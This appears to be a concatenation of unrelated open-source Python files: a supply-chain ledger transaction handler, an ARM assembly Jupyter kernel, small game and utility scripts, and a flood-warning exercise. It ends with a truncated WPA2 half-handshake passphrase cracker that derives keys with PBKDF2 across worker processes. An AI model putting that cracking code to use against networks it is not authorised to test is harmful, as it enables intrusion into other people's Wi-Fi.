        my_store['StoredTelemetry'] = payload.get('Telemetry', {})
        my_store['DomainAttributes'] = payload.get('DomainAttributes', {})
        # Determine if this record has parents
        has_parents = record_info['Parents'] is not None and \
            len(record_info['Parents']) > 0
        # If there are parents update Owner and Custodian depending on the
        # ApplicationType
        if has_parents:
            # Use the first parent
            parent_id = record_info['Parents'][0]
            parent_store = state_get_single(state, parent_id)
            if parent_store['RecordInfo']['ApplicationType'] == "Owner":
                # Transfer ownership - in this case there should be
                # no custodians.  Bug fix: the original condition was
                # inverted (`if not ...Custodians`), rejecting exactly the
                # valid case and allowing transfers with custodians present.
                if parent_store['RecordInfo']['Custodians']:
                    raise InvalidTransaction(
                        "Cannot transfer ownership when custodian is present")
                record_info['Owner'] = originator
                record_info['Custodians'] = []
            else:
                # Transfer custodianship
                record_info['Owner'] = \
                    parent_store['RecordInfo']['Owner']
                record_info['Custodians'] = \
                    list(parent_store['RecordInfo']['Custodians'])
                # Check the next to last element of the Custodians array. If it
                # is the new holder, then this is a 'pop' operation. It's also
                # a pop if here is one custodian and the applicant is the
                # owner.
                is_pop = False
                if len(record_info['Custodians']) > 1 and \
                        record_info['Custodians'][-2] == originator:
                    is_pop = True
                elif len(record_info['Custodians']) == 1 and \
                        record_info['Owner'] == originator:
                    is_pop = True
                if is_pop:
                    record_info['Custodians'].pop()
                else:
                    record_info['Custodians'].append(originator)
        else:
            # No parents, just create a new record
            record_info['Owner'] = originator
            record_info['Custodians'] = []
        # If there are parents mark them as final.
        if has_parents:
            for parent in record_info['Parents']:
                parent_store = state_get_single(state, parent)
                parent_store['RecordInfo']['Final'] = True
                state_put_single(state, parent, parent_store)
                # Remove the record from the former owner - even if this
                # is a custodian transfer we need to store the new
                # record ID with the owner.
                AgentHandler.remove_record_owner(
                    state,
                    parent_store['RecordInfo']["Owner"],
                    parent)
                # Remove the previous holder
                AgentHandler.remove_record_holder(
                    state,
                    parent_store['RecordInfo']["CurrentHolder"],
                    parent)
                # Remove the accepted application from the new owner
                AgentHandler.remove_accepted_application(
                    state,
                    parent_store['RecordInfo']['ApplicationFrom'],
                    parent)
        # Record the owner of the new record in the agent
        AgentHandler.add_record_owner(
            state, record_info["Owner"], record_id,
            record_info["Owner"] == record_info["CurrentHolder"])
        # Record the new record holder in the agent
        AgentHandler.add_record_holder(
            state, record_info["CurrentHolder"], record_id)
        # Register the sensor
        if sensor_id is not None:
            if state_get_single(state, sensor_idx) is not None:
                sensor_store = state_get_single(state, sensor_idx)
            else:
                sensor_store = {}
            sensor_store["Record"] = record_id
            sensor_store["Name"] = sensor_id
            state_put_single(state, sensor_idx, sensor_store)

    @classmethod
    def create_application(cls, originator, record_id,
                           payload, state, my_store):
        """Open an ownership/custodianship application on the record."""
        LOGGER.debug('create_application: %s', my_store)
        record_info = my_store['RecordInfo']
        LOGGER.debug(record_info)
        # Agent ID who initiated the application
        record_info['ApplicationFrom'] = originator
        # custodian or owner
        record_info['ApplicationType'] = payload['ApplicationType']
        # Should be encrypted?
        record_info['ApplicationTerms'] = payload['ApplicationTerms']
        # To indicate acceptance (or not) of the application.
        record_info['ApplicationStatus'] = "Open"
        LOGGER.debug(record_info)
        # Record the new application in the current holder
        AgentHandler.add_open_application(state,
                                          record_info['ApplicationFrom'],
                                          record_info['CurrentHolder'],
                                          record_id)

    @classmethod
    def accept_application(cls, originator, record_id, payload, state,
                           my_store):
        """Mark the open application as accepted and index it on the applicant.

        After this the new owner/custodian may create a child record with
        this record as parent.
        """
        record_info = my_store['RecordInfo']
        record_info['ApplicationStatus'] = "Accepted"
        # Record the accepted application in the new holder
        AgentHandler.remove_open_application(state,
                                             record_info['ApplicationFrom'],
                                             record_info['CurrentHolder'],
                                             record_id)
        AgentHandler.add_accepted_application(state,
                                              record_info['ApplicationFrom'],
                                              record_id,
                                              record_info['Sensor'])

    @classmethod
    def reject_application(cls, originator, record_id, payload, state,
                           my_store):
        """Mark the open application as rejected and drop it from the agent."""
        record_info = my_store['RecordInfo']
        record_info['ApplicationStatus'] = "Rejected"
        # Record the rejected application in the agent
        AgentHandler.remove_open_application(state,
                                             record_info['ApplicationFrom'],
                                             record_info['CurrentHolder'],
                                             record_id)

    @classmethod
    def cancel_application(cls, originator, record_id, payload, state,
                           my_store):
        """Mark the open application as cancelled and drop it from the agent."""
        record_info = my_store['RecordInfo']
        record_info['ApplicationStatus'] = "Cancelled"
        # Record the cancelled application in the agent
        AgentHandler.remove_open_application(state,
                                             record_info['ApplicationFrom'],
                                             record_info['CurrentHolder'],
                                             record_id)

    @classmethod
    def finalize_record(cls, originator, record_id, payload, state, my_store):
        """Permanently close the record; only the owner-and-holder may do so."""
        record_info = my_store['RecordInfo']
        record_info['Final'] = True
        # Remove the record from the agent
        if record_info['Owner'] != originator:
            raise InvalidTransaction('Only the current owner can finalize')
        if record_info['CurrentHolder'] != originator:
            raise InvalidTransaction('Only the current holder can finalize')
        AgentHandler.remove_record_owner(state, originator, record_id)
        AgentHandler.remove_record_holder(state, originator, record_id)
class AgentHandler(object):
    """Processes Agent transactions and maintains the per-agent record
    indices (owned/held records, open and accepted applications)."""

    @classmethod
    def apply(cls, transaction, state):
        """Handle an Agent payload; only the "Create" action is supported.

        Raises:
            InvalidTransaction: on a missing name, duplicate agent id, or
                an unknown action.
        """
        payload = json.loads(transaction.payload.decode())
        LOGGER.debug("AgentHandler.apply payload: %s", repr(payload))
        tnx_action = payload.get('Action', None)
        tnx_name = payload.get('Name', None)
        tnx_type = payload.get('Type', None)
        tnx_url = payload.get('Url', None)
        header = TransactionHeader()
        header.ParseFromString(transaction.header)
        # The agent's state address is derived from its signing key.
        uid = addressing.get_agent_id(header.signer_pubkey)
        if tnx_name is None or tnx_name == '':
            raise InvalidTransaction('Name not set')
        if tnx_action == "Create":
            LOGGER.debug("AgentHandler.apply CREATE")
            if state_get_single(state, uid) is not None:
                raise InvalidTransaction('Agent ID already registered')
            my_store = {}
            my_store['Name'] = tnx_name
            my_store['Type'] = tnx_type
            my_store['Url'] = tnx_url
            my_store['OwnRecords'] = {}
            my_store['HoldRecords'] = {}
            my_store['OpenApplications'] = {}
            my_store['AcceptedApplications'] = {}
            state_put_single(state, uid, my_store)
        else:
            raise InvalidTransaction('Action {} is not valid'.
                                     format(tnx_action))

    @classmethod
    def update_record_tracking(cls, state, agent_id, updates):
        """Apply a batch of index updates to one agent's store.

        Each update is a tuple ``(field, record_id, value, exists_is_ok)``;
        the sentinel value "del" removes the entry, anything else sets it
        (raising if it already exists and exists_is_ok is False).

        NOTE(review): "Identifer" in the message below is a typo of
        "Identifier"; left unchanged because it is a runtime string.
        """
        state_id = agent_id
        my_store = state_get_single(state, state_id)
        if my_store is None:
            raise InvalidTransaction("Identifer {} is not present in store".
                                     format(state_id))
        for update in updates:
            (field, record_id, value, exists_is_ok) = update
            if value == "del":
                if record_id not in my_store[field]:
                    raise InvalidTransaction(
                        "Record {} is not present in state".format(record_id))
                del my_store[field][record_id]
            else:
                if not exists_is_ok and record_id in my_store[field]:
                    raise InvalidTransaction(
                        "Record {} is already present in state".
                        format(record_id))
                my_store[field][record_id] = value
        state_put_single(state, state_id, my_store)

    @classmethod
    def add_record_owner(cls, state, identifier, record_id, own_and_hold):
        """Index *record_id* as owned; value 1 when the owner also holds it."""
        value = 1 if own_and_hold else 0
        AgentHandler.update_record_tracking(
            state, identifier, [("OwnRecords", record_id, value, True)])

    @classmethod
    def remove_record_owner(cls, state, identifier, record_id):
        """Drop *record_id* from the agent's owned-records index."""
        AgentHandler.update_record_tracking(
            state, identifier, [("OwnRecords", record_id, "del", False)])

    @classmethod
    def add_record_holder(cls, state, identifier, record_id):
        """Index *record_id* as held by the agent (0 = no open application)."""
        AgentHandler.update_record_tracking(
            state, identifier, [("HoldRecords", record_id, 0, False)])

    @classmethod
    def remove_record_holder(cls, state, identifier, record_id):
        """Drop *record_id* from the agent's held-records index."""
        AgentHandler.update_record_tracking(
            state, identifier, [("HoldRecords", record_id, "del", False)])

    @classmethod
    def add_open_application(cls, state, applier_id, holder_id, record_id):
        """Record a new open application on both applicant and holder."""
        AgentHandler.update_record_tracking(
            state, applier_id, [("OpenApplications", record_id, 1, False)])
        AgentHandler.update_record_tracking(
            state, holder_id, [("HoldRecords", record_id, 1, True)])

    @classmethod
    def remove_open_application(cls, state, applier_id, holder_id, record_id):
        """Clear an open application from both applicant and holder."""
        AgentHandler.update_record_tracking(
            state, applier_id,
            [("OpenApplications", record_id, "del", False)])
        AgentHandler.update_record_tracking(
            state, holder_id,
            [("HoldRecords", record_id, 0, True)])

    @classmethod
    def add_accepted_application(cls, state, identifier, record_id, sensor_id):
        """Index an accepted application (keyed by record, valued by sensor)."""
        AgentHandler.update_record_tracking(
            state, identifier,
            [("AcceptedApplications", record_id, sensor_id, False)])

    @classmethod
    def remove_accepted_application(cls, state, identifier, record_id):
        """Drop an accepted application from the agent's index."""
        AgentHandler.update_record_tracking(
            state, identifier,
            [("AcceptedApplications", record_id, "del", False)])
| 40.394737 | 80 | 0.591205 |
aaebd6d86a473c46810168a0f679eb02f758b767 | 875 | py | Python | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | 1 | 2021-01-11T09:01:51.000Z | 2021-01-11T09:01:51.000Z | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | null | null | null | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | 1 | 2021-01-10T09:25:45.000Z | 2021-01-10T09:25:45.000Z | class prefixtoinfix:
def prefixToInfix(self,prefix):
stack = []
l = []
# read prefix in reverse order
i = len(prefix) - 1
for j in prefix:
if j == ' ':
return [],False
while i >= 0:
if not self.isOperator(prefix[i]):
# symbol is operand
stack.append(prefix[i])
i -= 1
else:
# symbol is operator
str = "(" + stack.pop() + prefix[i] + stack.pop() + ")"
l.append(str)
stack.append(str)
i -= 1
return l,stack.pop()
def isOperator(self,c):
if c == "*" or c == "+" or c == "-" or c == "/" or c == "^" or c == "(" or c == ")":
return True
else:
return False | 29.166667 | 92 | 0.377143 |
aaebe47258a943fd8be9436d233e4c883e9d3710 | 13,212 | py | Python | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 20 | 2016-05-16T18:23:49.000Z | 2021-08-06T17:15:34.000Z | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 11 | 2016-07-14T17:57:10.000Z | 2020-11-18T21:11:21.000Z | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 4 | 2016-08-14T19:11:21.000Z | 2021-08-18T09:38:25.000Z | from ipykernel.kernelbase import Kernel
from iarm.arm import Arm
import re
import warnings
import iarm.exceptions
class ArmKernel(Kernel):
implementation = 'IArm'
implementation_version = '0.1.0'
language = 'ARM'
language_version = iarm.__version__
language_info = {
'name': 'ARM Coretex M0+ Thumb Assembly',
'mimetype': 'text/x-asm',
'file_extension': '.s'
}
banner = "Interpreted ARM"
    def __init__(self, *args, **kwargs):
        """Build the ARM interpreter, the magic dispatch table, and set the
        default number display mode to unsigned."""
        super().__init__(*args, **kwargs)
        self.interpreter = Arm(1024)  # 1K memory
        # Dispatch table: magic name (as typed after '%') -> handler method.
        # Short aliases ('reg', 'mem') share the same bound method.
        self.magics = {
            'run': self.magic_run,
            'register': self.magic_register,
            'reg': self.magic_register,
            'memory': self.magic_memory,
            'mem': self.magic_memory,
            'signed': self.magic_signed_rep,
            'unsigned': self.magic_unsigned_rep,
            'hex': self.magic_hex_rep,
            'help': self.magic_help,
            'generate_random': self.magic_generate_random,
            'postpone_execution': self.magic_postpone_execution
        }
        # Current display mode: 'unsigned', 'signed' or 'hex'.
        self.number_representation = ''
        self.magic_unsigned_rep('')  # Default to unsigned representation
def convert_representation(self, i):
"""
Return the proper representation for the given integer
"""
if self.number_representation == 'unsigned':
return i
elif self.number_representation == 'signed':
if i & (1 << self.interpreter._bit_width - 1):
return -((~i + 1) & (2**self.interpreter._bit_width - 1))
else:
return i
elif self.number_representation == 'hex':
return hex(i)
def magic_generate_random(self, line):
"""
Set the generate random flag, unset registers and memory will return a random value.
Usage:
Call the magic by itself or with `true` to have registers and memory return a random value
if they are unset and read from, much like how real hardware would work.
Defaults to False, or to not generate random values
`%generate_random`
or
`%generate_random true`
or
`%generate_random false`
"""
line = line.strip().lower()
if not line or line == 'true':
self.interpreter.generate_random = True
elif line == 'false':
self.interpreter.generate_random = False
else:
stream_content = {'name': 'stderr', 'text': "unknwon value '{}'".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': ValueError.__name__,
'evalue': "unknwon value '{}'".format(line),
'traceback': '???'}
def magic_postpone_execution(self, line):
"""
Postpone execution of instructions until explicitly run
Usage:
Call this magic with `true` or nothing to postpone execution,
or call with `false` to execute each instruction when evaluated.
This defaults to True.
Note that each cell is executed only executed after all lines in
the cell have been evaluated properly.
`%postpone_execution`
or
`%postpone_execution true`
or
`%postpone_execution false`
"""
line = line.strip().lower()
if not line or line == 'true':
self.interpreter.postpone_execution = True
elif line == 'false':
self.interpreter.postpone_execution = False
else:
stream_content = {'name': 'stderr', 'text': "unknwon value '{}'".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': ValueError.__name__,
'evalue': "unknwon value '{}'".format(line),
'traceback': '???'}
def magic_signed_rep(self, line):
"""
Convert all values to it's signed representation
Usage:
Just call this magic
`%signed`
"""
self.number_representation = 'signed'
def magic_unsigned_rep(self, line):
"""
All outputted values will be displayed with their unsigned representation
Usage:
Just call this magic
`%unsigned`
"""
self.number_representation = 'unsigned'
def magic_hex_rep(self, line):
"""
All outputed values will be displayed with their hexadecimal representation
Usage:
Just call this magic
`%hex`
"""
self.number_representation = 'hex'
def magic_register(self, line):
"""
Print out the current value of a register
Usage:
Pass in the register, or a list of registers separated by spaces
A list of registeres can be entered by separating them by a hyphen
`%reg R1`
or
`%reg R0 R5 R6`
or
`%reg R8-R12`
"""
message = ""
for reg in [i.strip() for i in line.replace(',', '').split()]:
if '-' in reg:
# We have a range (Rn-Rk)
r1, r2 = reg.split('-')
# TODO do we want to allow just numbers?
n1 = re.search(self.interpreter.REGISTER_REGEX, r1).groups()[0]
n2 = re.search(self.interpreter.REGISTER_REGEX, r2).groups()[0]
n1 = self.interpreter.convert_to_integer(n1)
n2 = self.interpreter.convert_to_integer(n2)
for i in range(n1, n2+1):
val = self.interpreter.register[r1[0] + str(i)]
val = self.convert_representation(val)
message += "{}: {}\n".format(r1[0] + str(i), val)
else:
val = self.interpreter.register[reg]
val = self.convert_representation(val)
message += "{}: {}\n".format(reg, val)
stream_content = {'name': 'stdout', 'text': message}
self.send_response(self.iopub_socket, 'stream', stream_content)
def magic_memory(self, line):
"""
Print out the current value of memory
Usage:
Pass in the byte of memory to read, separated by spaced
A list of memory contents can be entered by separating them by a hyphen
`%mem 4 5`
or
`%mem 8-12`
"""
# TODO add support for directives
message = ""
for address in [i.strip() for i in line.replace(',', '').split()]:
if '-' in address:
# We have a range (n-k)
m1, m2 = address.split('-')
n1 = re.search(self.interpreter.IMMEDIATE_NUMBER, m1).groups()[0]
n2 = re.search(self.interpreter.IMMEDIATE_NUMBER, m2).groups()[0]
n1 = self.interpreter.convert_to_integer(n1)
n2 = self.interpreter.convert_to_integer(n2)
for i in range(n1, n2 + 1):
val = self.interpreter.memory[i]
val = self.convert_representation(val)
message += "{}: {}\n".format(str(i), val)
else:
# TODO fix what is the key for memory (currently it's an int, but registers are strings, should it be the same?)
val = self.interpreter.memory[self.interpreter.convert_to_integer(address)]
val = self.convert_representation(val)
message += "{}: {}\n".format(address, val)
stream_content = {'name': 'stdout', 'text': message}
self.send_response(self.iopub_socket, 'stream', stream_content)
def magic_run(self, line):
"""
Run the current program
Usage:
Call with a numbe rto run that many steps,
or call with no arguments to run to the end of the current program
`%run`
or
`%run 1`
"""
i = float('inf')
if line.strip():
i = int(line)
try:
with warnings.catch_warnings(record=True) as w:
self.interpreter.run(i)
for warning_message in w:
# TODO should this be stdout or stderr
stream_content = {'name': 'stdout', 'text': 'Warning: ' + str(warning_message.message) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except iarm.exceptions.EndOfProgram as e:
f_name = self.interpreter.program[self.interpreter.register['PC'] - 1].__name__
f_name = f_name[:f_name.find('_')]
message = "Error in {}: ".format(f_name)
stream_content = {'name': 'stdout', 'text': message + str(e) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except Exception as e:
for err in e.args:
stream_content = {'name': 'stderr', 'text': str(err)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': type(e).__name__,
'evalue': str(e),
'traceback': '???'}
def magic_help(self, line):
"""
Print out the help for magics
Usage:
Call help with no arguments to list all magics,
or call it with a magic to print out it's help info.
`%help`
or
`%help run
"""
line = line.strip()
if not line:
for magic in self.magics:
stream_content = {'name': 'stdout', 'text': "%{}\n".format(magic)}
self.send_response(self.iopub_socket, 'stream', stream_content)
elif line in self.magics:
# its a magic
stream_content = {'name': 'stdout', 'text': "{}\n{}".format(line, self.magics[line].__doc__)}
self.send_response(self.iopub_socket, 'stream', stream_content)
elif line in self.interpreter.ops:
# it's an instruction
stream_content = {'name': 'stdout', 'text': "{}\n{}".format(line, self.interpreter.ops[line].__doc__)}
self.send_response(self.iopub_socket, 'stream', stream_content)
else:
stream_content = {'name': 'stderr', 'text': "'{}' not a known magic or instruction".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
# TODO add tab completion
# TODO add completeness (can be used to return the prompt back to the user in case of an error)
def run_magic(self, line):
# TODO allow magics at end of code block
# TODO allow more than one magic per block
if line.startswith('%'):
loc = line.find(' ')
params = ""
if loc > 0:
params = line[loc + 1:]
op = line[1:loc]
else:
op = line[1:]
return self.magics[op](params)
def run_code(self, code):
if not code:
return
try:
with warnings.catch_warnings(record=True) as w:
self.interpreter.evaluate(code)
for warning_message in w:
# TODO should this be stdout or stderr
stream_content = {'name': 'stdout', 'text': 'Warning: ' + str(warning_message.message) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except Exception as e:
for err in e.args:
stream_content = {'name': 'stderr', 'text': "{}\n{}".format(type(e).__name__, str(err))}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': type(e).__name__,
'evalue': str(e),
'traceback': '???'}
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
instructions = ""
for line in code.split('\n'):
if line.startswith('%'):
# TODO run current code, run magic, then continue
ret = self.run_code(instructions)
if ret:
return ret
instructions = ""
ret = self.run_magic(line)
if ret:
return ret
else:
instructions += line + '\n'
ret = self.run_code(instructions)
if ret:
return ret
return {'status': 'ok',
'execution_count': self.execution_count,
'payload': [],
'user_expressions': {}
}
if __name__ == '__main__':
from ipykernel.kernelapp import IPKernelApp
IPKernelApp.launch_instance(kernel_class=ArmKernel)
| 37.748571 | 128 | 0.546776 |
aaecb8a64722e04f0363e0de885f9fecd7b99152 | 383 | py | Python | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/evn python
class Student(object):
__slots__ = ('__birth', '__age')
@property
def birth(self):
return self.__birth
@birth.setter
def birth(self, value):
self.__birth = value
@property
def age(self):
return 2015 - self.__birth
if __name__ == '__main__':
stu = Student()
stu.birth = 1991
print(stu.age)
| 15.958333 | 36 | 0.587467 |
aaee23ba02e2df2083e1a2d6aa2430790b04b2a3 | 35 | py | Python | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | 1 | 2021-03-15T02:45:28.000Z | 2021-03-15T02:45:28.000Z | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | null | null | null | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | null | null | null | from .vocab import gloveVocabulary
| 17.5 | 34 | 0.857143 |
aaf0aa3cbdbb1c81c191ac04d6a56e4b822a4b99 | 980 | py | Python | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | 2 | 2022-03-10T22:22:19.000Z | 2022-03-24T14:42:55.000Z | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | null | null | null | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | null | null | null | import pygame
class Weapon(pygame.sprite.Sprite):
def __init__(self, player, groups):
super().__init__(groups)
self.spriteType = 'weapon'
direction = player.status.split('_')[0]
# graphic
fullPath = f'./src/img/weapons/{player.weapon}/{direction}.png'
self.image = pygame.image.load(fullPath).convert_alpha()
# placement
if direction == 'right':
self.rect = self.image.get_rect(
midleft=player.rect.midright + pygame.math.Vector2(0, 16))
elif direction == 'left':
self.rect = self.image.get_rect(
midright=player.rect.midleft + pygame.math.Vector2(0, 16))
elif direction == 'down':
self.rect = self.image.get_rect(
midtop=player.rect.midbottom + pygame.math.Vector2(0, 0))
else:
self.rect = self.image.get_rect(
midbottom=player.rect.midtop + pygame.math.Vector2(-10, 0))
| 36.296296 | 75 | 0.586735 |
aaf11ccf2412c6e3efada30eaecd8bb0db6b297a | 3,052 | py | Python | Assignment1/initial/src/main/mp/utils/AST.py | jimcbl/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | 1 | 2019-11-27T13:41:07.000Z | 2019-11-27T13:41:07.000Z | Assignment1/initial/src/main/mp/utils/AST.py | jimodayne/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | null | null | null | Assignment1/initial/src/main/mp/utils/AST.py | jimodayne/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | 1 | 2019-12-03T05:33:13.000Z | 2019-12-03T05:33:13.000Z | from abc import ABC, abstractmethod, ABCMeta
from Visitor import Visitor
class AST(ABC):
def __eq__(self, other):
return self.__dict__ == other.__dict__
@abstractmethod
def accept(self, v, param):
return v.visit(self, param)
class Program(AST):
#decl:list(Decl)
def __init__(self, decl):
self.decl = decl
def __str__(self):
return "Program(List(" + ','.join(str(i) for i in self.decl) + "))"
def accept(self, v: Visitor, param):
return v.visitProgram(self, param)
class Decl(AST):
__metaclass__ = ABCMeta
pass
class FuncDecl(Decl):
#name: Id
#param: list(VarDecl)
#returnType: Type
#body: Block
def __init__(self, name, param, returnType, body):
self.name = name
self.param = param
self.returnType = returnType
self.body = body
def __str__(self):
return "FuncDecl(" + str(self.name) + ",List(" + ','.join(str(i) for i in self.param) + ")," + str(self.returnType) + "," + str(self.body) + ")"
def accept(self, v, param):
return v.visitFuncDecl(self, param)
class Type(AST):
__metaclass__ = ABCMeta
pass
class IntType(Type):
def __str__(self):
return "IntType"
def accept(self, v, param):
return v.visitIntType(self, param)
class VoidType(Type):
def __str__(self):
return "VoidType"
def accept(self, v, param):
return v.visitVoidType(self, param)
class Stmt(AST):
__metaclass__ = ABCMeta
pass
class Expr(Stmt):
__metaclass__ = ABCMeta
pass
class CallExpr(Expr):
#method:Id
#param:list(Expr)
def __init__(self, method, param):
self.method = method
self.param = param
def __str__(self):
return "CallExpr(" + str(self.method) + ",List(" + ','.join(str(i) for i in self.param) + "))"
def accept(self, v, param):
return v.visitCallExpr(self, param)
class LHS(Expr):
__metaclass__ = ABCMeta
pass
class Id(LHS):
#name:string
def __init__(self, name):
self.name = name
def __str__(self):
return "Id(" + self.name + ")"
def accept(self, v, param):
return v.visitId(self, param)
class Block(Stmt):
#decl:list(VarDecl)
#stmt:list(Stmt)
def __init__(self, decl, stmt):
self.decl = decl
self.stmt = stmt
def __str__(self):
return "Block(List(" + ','.join(str(i) for i in self.decl) + "),List(" + ','.join(str(i) for i in self.stmt) + "))"
def accept(self, v, param):
return v.visitBlock(self, param)
class Literal(Expr):
__metaclass__ = ABCMeta
pass
class IntLiteral(Literal):
#value:int
def __init__(self, value):
self.value = value
def __str__(self):
return "IntLiteral(" + str(self.value) + ")"
def accept(self, v, param):
return v.visitIntLiteral(self, param)
| 23.476923 | 154 | 0.572412 |
aaf368c0cbb0ab66f42b16908ff73d7af84048da | 1,224 | py | Python | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 3 | 2021-12-06T16:44:16.000Z | 2022-03-30T05:45:48.000Z | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 8 | 2022-02-14T22:39:19.000Z | 2022-03-31T01:54:06.000Z | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 1 | 2022-02-15T18:59:44.000Z | 2022-02-15T18:59:44.000Z | #
# Download images from the LOC IIIF server and store them locally
#
import requests
from pathlib import Path
import shutil
import time
base = 'https://www.loc.gov/'
iiifbase = 'https://tile.loc.gov/image-services/iiif/'
def getImages(item, dest_dir):
downloaded_images = list()
Path(dest_dir).mkdir(parents=True, exist_ok=True)
imagenum = item['start']
while imagenum <= item['end']:
imgurl = iiifbase + item['service'].format(str(imagenum).zfill(4))
r = requests.get(imgurl, stream=True)
if r.status_code == 200:
imgname = item['lc_id'] + '_' + str(imagenum).zfill(4) + '.jpg'
imgpath = dest_dir + '/' + imgname
image_info = {
"image_name": imgname,
"image_location": dest_dir,
"source": imgurl,
"image_url": "https://www.loc.gov/resource/{}/?sp={}".format(item['lc_id'], str(imagenum).zfill(4)).replace("gdcustel", "usteledirec")
}
downloaded_images.append(image_info)
with open(imgpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
time.sleep(1)
imagenum += 1
print(imgurl)
return downloaded_images | 36 | 146 | 0.607843 |
aaf4cca94bb840d24c6ed43cf92a6175ba126324 | 1,291 | py | Python | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.stationdata import build_station_list, update_water_levels
import floodsystem.flood as flood
import floodsystem.plot as plot
from datetime import datetime, timedelta
import datetime
stations = build_station_list()
update_water_levels(stations)
# plots the water levels over the past 10 days for the 5 stations at which the current relative water level is greatest.
def run():
"""Requirements for Task 2E"""
# makes a list of the 5 stations with the highest relative water level in descending order
top_five = flood.stations_highest_rel_level(stations, 5)
for i in range(5):
station_name = top_five[i][0].name
station_check = None
for station in stations:
if station.name == station_name:
station_check = station
break
if not station_check:
print("Station {} could not be found".format(station_name))
dt = 10
dates, levels = fetch_measure_levels(station_check.measure_id, dt = datetime.timedelta(days=dt))
plot.plot_water_levels(station, dates, levels)
if __name__ == "__main__":
print("*** Task 2E: CUED Part IA Flood Warning System ***")
run()
| 32.275 | 120 | 0.691712 |
aaf7c70154f36b59a8bb5810940a58d3ac7062c0 | 2,007 | py | Python | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | import hmac, hashlib, binascii
from hashlib import sha1
from binascii import a2b_hex, b2a_hex, unhexlify
from pbkdf2_ctypes import pbkdf2_bin
from multiprocessing import Pool, Queue, cpu_count
from datetime import datetime
from time import sleep
numOfPs = cpu_count()
def hmac4times(ptk, pke):
tempPke = pke
r = ''
for i in range(4):
r += hmac.new(ptk, pke + chr(i), sha1).digest()
return r
def crackProcess(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ):
pke = "Pairwise key expansion" + '\x00' + min(APMac, clientMac) + max(APMac, clientMac) + min(Anonce, Snonce) + max(Anonce, Snonce)
count = 0
timeA = datetime.now()
while True:
passPhrase = passQueue.get()
pmk = pbkdf2_bin(passPhrase, ssid, 4096, 32)
